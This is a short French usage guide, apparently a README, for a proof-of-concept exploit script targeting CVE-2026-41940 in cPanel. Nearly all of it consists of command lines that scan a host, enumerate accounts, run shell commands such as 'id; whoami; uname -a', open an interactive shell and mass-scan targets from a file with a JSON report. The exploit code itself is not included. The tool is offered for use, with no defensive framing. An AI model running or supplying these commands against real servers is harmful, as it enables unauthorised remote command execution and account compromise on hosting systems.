
Preuve de concept d'exploitation pour CVE-2026-41940 ciblant cPanel, permettant l'énumération de comptes, l'exécution de commandes et l'accès à un shell interactif sur les hôtes vulnérables.
python3 poc_CVE-2026-41940.py -h
Scanner un hôte
python3 poc_CVE-2026-41940.py -u https://target.example:2086
Lister les comptes après une chaîne réussie
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action list
Exécuter une commande shell
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action cmd --cmd 'id; whoami; uname -a'
Shell interactif
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action shell
Cibles depuis un fichier + rapport JSON
python3 poc_CVE-2026-41940.py -l targets.txt -t 20 -o results.json
réf : ynsmroztas